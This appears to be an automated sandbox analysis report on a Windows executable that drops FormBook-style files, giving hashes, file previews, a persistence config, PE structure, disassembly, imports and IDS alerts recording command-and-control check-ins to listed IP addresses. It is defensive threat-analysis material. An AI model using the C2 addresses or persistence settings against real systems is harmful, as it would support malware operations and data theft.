                                                                                            Preview:R7W7oi16Z190KI8q1937JR65wPIM2688E7e4Uc3V8u15da08A3z6wu9d3caxj8330YT..ComboConstants TreeViewConstants..4NM6m07K14..ButtonConstants StructureConstants..slaF1At1mZn743m7O191E954Q0053194KJto51XFf5RN7791m46J02DgXU481qHI8krhM326mp5iI5288169H1o1YWDWE6iYhM0Oq03Of30eTK8059ybj3q211LpH0Qt9u1c5959k6WC0B87MK611PEhg5jD142b..FileConstants ColorConstants..23AFpl6wZC3uwN257S6Xy14m76W8k16..StructureConstants GuiDateTimePicker..w360P76k86ep942ObxF1y7IVz2S..StructureConstants BorderConstants..U5648n..TreeViewConstants ToolbarConstants..

                                                                                            C:\Users\user\AppData\Roaming\uhex\tsmr.vbe

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm
                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (392), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):94814
                                                                                            Entropy (8bit):3.0148514611543757
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:D////////////////////7HK////////////////////aQ/////////////////G:nHW9I5UIHh
                                                                                            MD5:9F66BDFD750000E306B9C3504B6BF382
                                                                                            SHA1:EEF56276E2A5A2C2D10628277A622E9898FD85EF
                                                                                            SHA-256:17F34305C6B54964D2D2944B617B3DECD1434A627C96CF65B3250CDA4AA9EFD2
                                                                                            SHA-512:A9CBFFA5D4D9907062A0AF2B6B21D32531C4C80D6BDD8FC5B9B997AD560BECB5F5286BF044F5CA8F7088E520E6E2028DC1A07218808BB8D5B00296D0D18344BF
                                                                                            Malicious:false
                                                                                            Preview:..T.e.l.e.V.r.a.m.(.2.2.3.).:.T.e.l.e.V.r.a.m.(.2.2.3.).:.T.e.l.e.V.r.a.m.(.2.2.3.).:.T.e.l.e.V.r.a.m.(.2.2.3.).:.T.e.l.e.V.r.a.m.(.2.2.3.).:.T.e.l.e.V.r.a.m.(.2.2.3.).:.T.e.l.e.V.r.a.m.(.2.2.3.).:.T.e.l.e.V.r.a.m.(.2.2.3.).:.T.e.l.e.V.r.a.m.(.2.2.3.).:.T.e.l.e.V.r.a.m.(.2.2.3.).:.T.e.l.e.V.r.a.m.(.2.2.3.).:.T.e.l.e.V.r.a.m.(.2.2.3.).:.T.e.l.e.V.r.a.m.(.2.2.3.).:.T.e.l.e.V.r.a.m.(.2.2.3.).:.T.e.l.e.V.r.a.m.(.2.2.3.).:.T.e.l.e.V.r.a.m.(.2.2.3.).:.T.e.l.e.V.r.a.m.(.2.2.3.).:.T.e.l.e.V.r.a.m.(.2.2.3.).:.T.e.l.e.V.r.a.m.(.2.2.3.).:.T.e.l.e.V.r.a.m.(.2.2.3.).:.T.e.l.e.V.r.a.m.(.2.2.3.).:.....T.e.l.e.V.r.a.m.(.6.7.).:.T.e.l.e.V.r.a.m.(.6.7.).:.T.e.l.e.V.r.a.m.(.6.7.).:.T.e.l.e.V.r.a.m.(.6.7.).:.T.e.l.e.V.r.a.m.(.6.7.).:.T.e.l.e.V.r.a.m.(.6.7.).:.T.e.l.e.V.r.a.m.(.6.7.).:.T.e.l.e.V.r.a.m.(.6.7.).:.T.e.l.e.V.r.a.m.(.6.7.).:.T.e.l.e.V.r.a.m.(.6.7.).:.T.e.l.e.V.r.a.m.(.6.7.).:.T.e.l.e.V.r.a.m.(.6.7.).:.T.e.l.e.V.r.a.m.(.6.7.).:.T.e.l.e.V.r.a.m.(.6.7.).:.T.e.l.e.V.r.a.m.(.6.7.).:.T.e.l.e.V.r.a.m.

                                                                                            C:\Users\user\AppData\Roaming\uhex\ttuxwtpb.xl

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):508
                                                                                            Entropy (8bit):5.419302921343066
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:aRJu0NCfDCRiy+k5VRjP2WzkuxVLl9k2ZJ:aDuoCuEyb5zeSk+ll9RJ
                                                                                            MD5:C61D3A184A0466FD013ECACEC38B0020
                                                                                            SHA1:12CDD1B12D296EA3A9CE6F0F1C4B15F2900E8DEA
                                                                                            SHA-256:FD4C4B681CB631A55C393819946326033C002EA1F1DE0886D61024348B98E28D
                                                                                            SHA-512:F87933ABEDEA583C212F34EC95349F53F692CEEF200CD577B65EF1C39EDB554C66D19C382228F8454BE52BE7ADAFCAE747EF1ED07DA20A59AEE682A038132C2F
                                                                                            Malicious:false
                                                                                            Preview:6NC28o7H9j16RM750o83m3884wd12o490f7..StructureConstants UpDownConstants..00TZOwQG9o1MFb84Pf0..ButtonConstants FontConstants..2Dw5T07RkT9HoJ4tZ4533354G1F0zNXg98h015AbV69Qrt8708XKe..ButtonConstants DateTimeConstants..9XX5w22Tv2lS5a6839s8X0810R89Xz096u7o526y8432aiX921XU9268XQ7s..UpDownConstants ColorConstants..5wtB6713CTj2528fK63o5fP16hl0bh62H19a3b56178M25IP4W4RNj68B8k51o418xOK4K74udc55p0W5yw6rTaNE2sXvN8a028t4C79kAjlM0ai280Ls0oe093176MUan207sT7Cu3EPgwq919X9YMO3N67446GVz9C..DateTimeConstants FontConstants..

                                                                                            C:\Users\user\AppData\Roaming\uhex\vbepwhj.mp3

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):125535210
                                                                                            Entropy (8bit):7.10415179033749
                                                                                            Encrypted:false
                                                                                            SSDEEP:98304:dd/dMdYdqdud4d/dwdtd3dQdAdWdwdpdrd3dUdGdddCdgdldxdTdHd0dvdGdpdvx:5
                                                                                            MD5:6C0B2E90C88041FF7019A13FDBBA5502
                                                                                            SHA1:70B5811313AA4B31E3A2A8FB485FDCAB27C0D52E
                                                                                            SHA-256:5D91FB4BD2F8530F67EB4A43262EFA75273A8A47118D104DD2140A4092B5A6DD
                                                                                            SHA-512:3A95F6D854A7A3DC91C10E4B4B3A0BF3443347D9E34B8ABC55CFE64E96CDE64EE09F512EAB1C6321289FAFF175BC7BD1F78085D2AB41162733E9FB28CF0DF2A8
                                                                                            Malicious:false
                                                                                            Preview:..;.B...+.2tfT.;.a.....\:..|:s..23!....V&.......d.}..(.A..e...).....P.w%|a?-.C7..]...U...!..W.%.J.V.8a..F...+F.g...H.nN@....e.+..yq..5...M.Z@.x......|.T.*.....2..#......#.c.s.[P...6........D=.."..B.e.#1.e....f...g..x.....t.:C..{.......s.8!(......N$'.>;tI|.D..=..z..K..._...j,......&...........RFG..$./.....M..w........N/.uU@.....5.4.8.i.4.9.6.Q.9.c.L.9.f.4.W.6.4.z.....S..T..F..c9h..0.....zrVO....E.+.#'7.....c..3k<g.:...M..Hu..... .......c.."M.........^..R....+..h.....8...G.\r......Y.?...4p...|J...Q........}...0ca..g>...V+.D(..kPV.....-=z..F}.a}T..*.......T>*..3/~..$...Bb.e....W....w.u.S..k.-..>v....H..Wo.P.C.].[k.s=.......l...._F@e.V...*.R..CB.d..3?.r..........q.?..fp).KZJ.|.N.....(oo.y.O.1_..*\...T..C...\..`%.....#[W.>......u...B....h7.....<..#..X.!]....h..x.6..\...5.Y...<......4.s.H.5.m.2.7.d.Z.H.9.z.3.9.1.W.9.q.f.0.0.4.I.8.7........3..&..5B.\'...5U.`.\..Y..$..:.W{.xTD..z...../.....W.....v.KN.;..(bc.-..2.F....$`.7.P>.......?.<.k..[..

                                                                                            C:\Users\user\AppData\Roaming\uhex\vldrkjskmt.txt

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):507
                                                                                            Entropy (8bit):5.602136112671
                                                                                            Encrypted:false
                                                                                            SSDEEP:
                                                                                            MD5:C3034A15D775CAB046D7756E88C7FC1A
                                                                                            SHA1:D9A711189FAEEB8F4589AE62E5EB75BDF15ACD04
                                                                                            SHA-256:7EBD5255F7CF791045BF8FFC387C7FBCCCF57F60FB7F04280B56BE65A723C930
                                                                                            SHA-512:B154A3D50390C318EACF24260A4BCCA78288442505CB8BEBFA683E205161BE0A3438D3E44ACE97F01775C357C439CB5FE037D5AB6CECA66B05118413DEC190A4
                                                                                            Malicious:false
                                                                                            Preview:H3A1Cb10529Bc5Ij711u265q302j7zv815H2iQ3Tg932H55AN13x08pI17D04RaZ651yPuaD7SPW1oIe85yazKKe4KI599o740ie0g9w7803KY6H5Tq54FxfH4y0f36737g3XgW27..GuiDateTimePicker ButtonConstants..S3L9D7gY8dAr346do10x1ltt53C2R754f9eyeU231CFm30PK8z99f08V7T50ut00ucI7dBy375xrF3eU5DTIH1QzA558t6V49638NZe71KA9Nh..GuiDateTimePicker ToolbarConstants..7S1je7CDzs77788w4297W7BMcb3x75Wb3kCGL7wEs5i2uGNSz58I38jhq33q657m02654T2l99th5PPj9lP0vY41q7w6P488K41G5z46Rrw9b81711YdX5n94Fw801at0O03IQCmFb77CT8Wxj7U244R..ComboConstants ColorConstants..

                                                                                            C:\Users\user\AppData\Roaming\uhex\vrhk.mp3

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:modified
                                                                                            Size (bytes):565
                                                                                            Entropy (8bit):5.560109550665888
                                                                                            Encrypted:false
                                                                                            SSDEEP:
                                                                                            MD5:1A4B5F34A030C342815A5D774D016639
                                                                                            SHA1:803A73F0FAF9F6651A2B674E3773AB899991033F
                                                                                            SHA-256:7F7CA6630552C360096456892184D04ACC7CA272080FFAF53D8EC6AB256ABBB7
                                                                                            SHA-512:2D7A3624500366867CDEAA3AEE91760B48B91A34C6F9FBB4160FA6BF268BD3F506994626E3599970A1B0179E7BDE5C449C45CD9FFC3F154E403FAFAC60A964F2
                                                                                            Malicious:false
                                                                                            Preview:2t48VtfoQQp73UW77v8oN884r74M26m5y54A5kD3g9G142p4IV45538751u67z695155029j8841259751Jd0699E9NIl2fbO2nfsx6cSx01njp7Ep8FMz7y5Kf836..DateTimeConstants ButtonConstants..D907ktUHx10s1K93eDgQ6C99m198UDJ08GrfnP49Y1rKbGjt5jxyJz6kfNP30R68212kQ2904E1i5S853f2G7g8cUu7..ColorConstants ToolbarConstants..q2g4VZx8xsHPMTwQ7529O9YQ82628HB9f1Fck2dKs17214Q507Q7mDh9o60V49L68jH723s7X55F8X65UQ7089MQVB9K102BpgE4Uo35UQw2441945H12o9M4118xO83..UpDownConstants ToolbarConstants..i5R8H6wI35V8b5q9YFQk3Jsm2TuCaOvgSs71g12mLRym3Ycl9O35s7Q8sA9071BeV30jF0J3Mb7..ToolTipConstants ToolbarConstants..

                                                                                            C:\Users\user\temp\dlbpa.docx

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):85
                                                                                            Entropy (8bit):4.885862043356909
                                                                                            Encrypted:false
                                                                                            SSDEEP:
                                                                                            MD5:BD02417DC940F29598B0AAA3E8722C99
                                                                                            SHA1:87365BF3899781743DB158A2840982DFD44F472A
                                                                                            SHA-256:0FC746E495FF5F1602ABFB1F2F94EA5D5DA6E777D5AD47DACC94B00E8E8CD585
                                                                                            SHA-512:E6D338E14949668EEB61745F0D5513918001FA3E5315AA571BF66950BDD19C1A2C7A5035A420193DB09C0FB092AEF6E01EEC8E598D3C21024800827B0988349C
                                                                                            Malicious:false
                                                                                            Preview:[S3tt!ng]..stpths=%appdata%..Key=WindowsUpdate..Dir3ctory=uhex..ExE_c=bpqdpksed.icm..

                                                                                            Static File Info

                                                                                            General

                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Entropy (8bit):7.7643756659574645
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                            File name:FS04dlvJrq.exe
                                                                                            File size:1'336'477 bytes
                                                                                            MD5:15227b37f486cb74c7676395a12c9296
                                                                                            SHA1:aef022249d8320d02fc5917813df39ceb7f85205
                                                                                            SHA256:16b2851cd765c313395a3cba2a38a16d4338ef32bb68e5c13320494b3c84c52a
                                                                                            SHA512:d01684862e111db09ee010258ba3da2a136af5afaaf3416cf21291ef6fb6d4f2f1c3559ff5f5064a6a760d255b3a0c316df30992c9923be7622dac96f9076ccc
                                                                                            SSDEEP:24576:gN/BUBb+tYjBFHt1IarY0FzwklsQOmNrHS7XiM0hD6di/AO:0pUlRht1IaEUzwkiQVNrS7XiM0hDTF
                                                                                            TLSH:D6551212BBC8C0B3D17516315AA697211D7C7D705F618ACB63E02ABE9B715C2D232FA3
                                                                                            File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......v..p2.b#2.b#2.b#.E.#?.b#.E.#..b#.E.#*.b#...#0.b#..f"!.b#..a"*.b#..g"..b#;..#9.b#;..#5.b#2.c#,.b#..g"..b#..b"3.b#...#3.b#..`"3.b

                                                                                            File Icon

                                                                                            Icon Hash:033d3f1f9fde611f

                                                                                            Static PE Info

                                                                                            General

                                                                                            Entrypoint:0x4265d0
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x6640971F [Sun May 12 10:17:03 2024 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:5
                                                                                            OS Version Minor:1
                                                                                            File Version Major:5
                                                                                            File Version Minor:1
                                                                                            Subsystem Version Major:5
                                                                                            Subsystem Version Minor:1
                                                                                            Import Hash:99ee65c2db82c04251a5c24f214c8892

                                                                                            Entrypoint Preview

                                                                                            Instruction
                                                                                            call 00007FB3650718EBh
                                                                                            jmp 00007FB36507126Dh
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            push ecx
                                                                                            lea ecx, dword ptr [esp+08h]
                                                                                            sub ecx, eax
                                                                                            and ecx, 0Fh
                                                                                            add eax, ecx
                                                                                            sbb ecx, ecx
                                                                                            or eax, ecx
                                                                                            pop ecx
                                                                                            jmp 00007FB36507091Fh
                                                                                            push ecx
                                                                                            lea ecx, dword ptr [esp+08h]
                                                                                            sub ecx, eax
                                                                                            and ecx, 07h
                                                                                            add eax, ecx
                                                                                            sbb ecx, ecx
                                                                                            or eax, ecx
                                                                                            pop ecx
                                                                                            jmp 00007FB365070909h
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            sub esp, 0Ch
                                                                                            lea ecx, dword ptr [ebp-0Ch]
                                                                                            call 00007FB365063E49h
                                                                                            push 0044634Ch
                                                                                            lea eax, dword ptr [ebp-0Ch]
                                                                                            push eax
                                                                                            call 00007FB365072117h
                                                                                            int3
                                                                                            jmp 00007FB365077E4Eh
                                                                                            int3
                                                                                            int3
                                                                                            push 004293C0h
                                                                                            push dword ptr fs:[00000000h]
                                                                                            mov eax, dword ptr [esp+10h]
                                                                                            mov dword ptr [esp+10h], ebp
                                                                                            lea ebp, dword ptr [esp+10h]
                                                                                            sub esp, eax
                                                                                            push ebx
                                                                                            push esi
                                                                                            push edi
                                                                                            mov eax, dword ptr [00449778h]
                                                                                            xor dword ptr [ebp-04h], eax
                                                                                            xor eax, ebp
                                                                                            push eax
                                                                                            mov dword ptr [ebp-18h], esp
                                                                                            push dword ptr [ebp-08h]
                                                                                            mov eax, dword ptr [ebp-04h]
                                                                                            mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                            mov dword ptr [ebp-08h], eax
                                                                                            lea eax, dword ptr [ebp-10h]
                                                                                            mov dword ptr fs:[00000000h], eax
                                                                                            ret
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            mov ecx, dword ptr [ebp-10h]
                                                                                            mov dword ptr fs:[00000000h], ecx
                                                                                            pop ecx
                                                                                            pop edi
                                                                                            pop edi
                                                                                            pop esi
                                                                                            pop ebx
                                                                                            mov esp, ebp
                                                                                            pop ebp
                                                                                            push ecx
                                                                                            ret
                                                                                            push ebp
                                                                                            mov ebp, esp

                                                                                            Rich Headers

                                                                                            Programming Language:
                                                                                            • [ C ] VS2008 SP1 build 30729
                                                                                            • [IMP] VS2008 SP1 build 30729

                                                                                            Data Directories

                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x47d700x34.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x47da40x50.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x580000x1c11c.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x750000x2afc.reloc
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x445800x54.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x446000x18.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3ec580x40.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x3c0000x280.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x4722c0x120.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                            Sections

                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            .text0x10000x3a32c0x3a400e320764e1b3c816ba80aeb820cb8a274False0.581381605418455data6.685359764265178IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                            .rdata0x3c0000xcbf80xcc0047c3be3304bfdfb2a778f355849d1c3fFalse0.4439529718137255data5.167069652624378IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .data0x490000xd7e00x12006335f9314c2900dccb530e151f1b1ee8False0.3956163194444444data4.0290550032041IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .didat0x570000x1a80x200232a8fe82993b55cefe09cffc39a79b0False0.462890625data3.5080985761326375IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .rsrc0x580000x1c11c0x1c200a7c879b9efaf4636d4442b596ecc51a4False0.6667708333333333data6.562176685447764IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .reloc0x750000x2afc0x2c0098fd4bc572f87a21f69dc57f720a6dbcFalse0.75data6.617141671767599IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                            Resources

                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                            PNG0x588240xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                                                            PNG0x5936c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                                                            RT_ICON0x5a9180xa68Device independent bitmap graphic, 64 x 128 x 4, image size 20480.30255255255255253
                                                                                            RT_ICON0x5b3800x668Device independent bitmap graphic, 48 x 96 x 4, image size 11520.38109756097560976
                                                                                            RT_ICON0x5b9e80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 5120.4596774193548387
                                                                                            RT_ICON0x5bcd00x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 2880.5491803278688525
                                                                                            RT_ICON0x5beb80x128Device independent bitmap graphic, 16 x 32 x 4, image size 1280.5506756756756757
                                                                                            RT_ICON0x5bfe00x1628Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors0.4495768688293371
                                                                                            RT_ICON0x5d6080xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors0.5871535181236673
                                                                                            RT_ICON0x5e4b00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors0.7048736462093863
                                                                                            RT_ICON0x5ed580x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors0.7482718894009217
                                                                                            RT_ICON0x5f4200x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors0.42557803468208094
                                                                                            RT_ICON0x5f9880x99d3PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.994006958023312
                                                                                            RT_ICON0x6935c0x4228Device independent bitmap graphic, 64 x 128 x 32, image size 168960.37653519130845536
                                                                                            RT_ICON0x6d5840x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.5063278008298755
                                                                                            RT_ICON0x6fb2c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.5422138836772983
                                                                                            RT_ICON0x70bd40x988Device independent bitmap graphic, 24 x 48 x 32, image size 24000.569672131147541
                                                                                            RT_ICON0x7155c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.43439716312056736
                                                                                            RT_DIALOG0x719c40x286dataEnglishUnited States0.5092879256965944
                                                                                            RT_DIALOG0x71c4c0x13adataEnglishUnited States0.60828025477707
                                                                                            RT_DIALOG0x71d880xecdataEnglishUnited States0.6991525423728814
                                                                                            RT_DIALOG0x71e740x12edataEnglishUnited States0.5927152317880795
                                                                                            RT_DIALOG0x71fa40x338dataEnglishUnited States0.45145631067961167
                                                                                            RT_DIALOG0x722dc0x252dataEnglishUnited States0.5757575757575758
                                                                                            RT_STRING0x725300x1e2dataEnglishUnited States0.3900414937759336
                                                                                            RT_STRING0x727140x1ccdataEnglishUnited States0.4282608695652174
                                                                                            RT_STRING0x728e00x1b8dataEnglishUnited States0.45681818181818185
                                                                                            RT_STRING0x72a980x146dataEnglishUnited States0.5153374233128835
                                                                                            RT_STRING0x72be00x46cdataEnglishUnited States0.3454063604240283
                                                                                            RT_STRING0x7304c0x166dataEnglishUnited States0.49162011173184356
                                                                                            RT_STRING0x731b40x152dataEnglishUnited States0.5059171597633136
                                                                                            RT_STRING0x733080x10adataEnglishUnited States0.49624060150375937
                                                                                            RT_STRING0x734140xbcdataEnglishUnited States0.6329787234042553
                                                                                            RT_STRING0x734d00x1c0dataEnglishUnited States0.5178571428571429
                                                                                            RT_STRING0x736900x250dataEnglishUnited States0.44256756756756754
                                                                                            RT_GROUP_ICON0x738e00xe6data0.591304347826087
                                                                                            RT_MANIFEST0x739c80x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                                                                            Imports

                                                                                            DLLImport
                                                                                            KERNEL32.dllLocalFree, GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, CreateDirectoryW, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, GlobalMemoryStatusEx, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, IsValidCodePage, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, WaitForSingleObjectEx, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, HeapReAlloc, LCMapStringW, FindFirstFileExA, FindNextFileA
                                                                                            OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                                                            gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                                                                            Possible Origin

                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                            EnglishUnited States

                                                                                            Network Behavior

                                                                                            Suricata IDS Alerts

                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                            2024-11-06T16:06:09.037540+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.649735TCP
                                                                                            2024-11-06T16:06:47.697936+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.649920TCP
                                                                                            2024-11-06T16:07:04.914090+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649982216.40.34.4180TCP
                                                                                            2024-11-06T16:07:20.691584+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6499853.33.130.19080TCP
                                                                                            2024-11-06T16:07:23.239548+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6499863.33.130.19080TCP
                                                                                            2024-11-06T16:07:25.780692+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6499873.33.130.19080TCP
                                                                                            2024-11-06T16:07:28.309362+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6499883.33.130.19080TCP
                                                                                            2024-11-06T16:07:35.957533+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649989192.197.113.6780TCP
                                                                                            2024-11-06T16:07:38.551301+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649990192.197.113.6780TCP
                                                                                            2024-11-06T16:07:41.229477+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649991192.197.113.6780TCP
                                                                                            2024-11-06T16:07:43.613704+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649992192.197.113.6780TCP
                                                                                            2024-11-06T16:07:49.679877+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649994162.0.225.21880TCP
                                                                                            2024-11-06T16:07:52.263241+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649995162.0.225.21880TCP
                                                                                            2024-11-06T16:07:54.832066+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649996162.0.225.21880TCP
                                                                                            2024-11-06T16:07:57.981805+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649997162.0.225.21880TCP

                                                                                            Network Port Distribution

                                                                                            TCP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Nov 6, 2024 16:07:04.225207090 CET4998280192.168.2.6216.40.34.41
                                                                                            Nov 6, 2024 16:07:04.230083942 CET8049982216.40.34.41192.168.2.6
